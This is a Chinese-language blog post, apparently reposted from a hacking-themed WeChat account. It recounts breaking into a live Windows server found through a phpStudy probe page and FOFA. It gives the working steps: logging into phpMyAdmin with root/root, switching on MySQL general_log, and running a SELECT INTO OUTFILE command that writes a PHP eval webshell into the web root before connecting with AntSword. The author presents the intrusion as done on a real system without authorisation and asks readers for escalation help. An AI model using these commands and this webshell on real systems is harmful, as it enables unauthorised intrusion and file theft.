從漏洞復現到實戰提權
前提
之前有過幾次實戰getshell了,但是管理員比較敏感,解決不了就下線,趁著這次管理員還沒有下線,趕緊拿出來投個稿。
資訊收集
因為偶然看到了phpstudy探針,所以就去fofa搜尋了一下:
(因為是很久以前的洞了,所以大部分網站都補了,我應該算是撿了個漏)
大概頁面如下:
在這裡,需要注意的是絕對路徑,伺服器作業系統,php版本,ip
絕對路徑:G:/www/index.php
作業系統:Windows NT HB2008 6.1 build 7601
php版本:5.2.17
測試弱口令
弱口令:root/root或者root/空(不過最新的phpmyadmin貌似不允許用root登入)
當我填入root/root時,進行賬號密碼測試:
一看連線到mysql資料庫正常,開心,訪問url/phpmyadmin
同樣用root和root登入上
<h1>檢視當前許可權</h1>
習慣性檢視當前使用者許可權:
-
select user();
一看,漂亮,root許可權,那不是代表我們可以為所欲為?
但是我們需要寫入一句話,那麼需要知道該伺服器是否可以寫入檔案:
-
show variables like '%general%'; #檢視配置
寫入檔案許可權開啟,並且知道了寫入路徑;
補充:
如果不是root那就需要一系列提權操作,社群裡各位大哥講得很詳細,我就不贅述了。
如果原本寫入檔案許可權沒有開啟,就需要讓它開啟,命令如下:
-
set global general_log = on; #開啟general log模式
-
set global general_log_file = '/var/www/html/1.php'; #設定日誌目錄為shell地址
插入一句話木馬
在資訊收集那步(或者通過查詢寫入檔案許可權的時候),我們已經知道了絕對路徑,就隨便找一個數據庫,插入一句話木馬,如下:
-
select '<?php echo "a";@eval($_POST[a]);?>' into outfile 'G:\\www\\shelll.php';
之後連線直接連線蟻劍:
就這樣,我幾乎可以瀏覽這個電腦上除了c盤以外的盤的所有檔案,並對其進行上傳下載檔案。
後話
大概過了幾天,管理員發現了,於是加了D盾。
shell沒刪,但是許可權極低。只允許在當前的G盤活動
探針沒關,但是寫入檔案會被D盾攔截
一點一點試了之後,發現這個過濾的機制很狗,D盾過濾把select的s換成了_,然後一旦執行除表名之外的查詢就被攔截,也不允許建立庫表之類的。
暫時就止步於此了,對於windows提權我也不是很熟,想知道各位表哥之後怎麼對它進行提權。
我是一坨小海綿,每天吸收一點點~多少多少秒後,我也是個海綿寶寶
學習更多黑客技能!
(掃碼領黑客視訊資料及工具)
本文分享自微信公眾號 - 暗網黑客(HackRead)。
如有侵權,請聯絡 [email protected] 刪除。
本文參與“OSC源創計劃”,歡迎正在閱讀的你也加入,一起分享。
推薦:尚比亞是哪個國家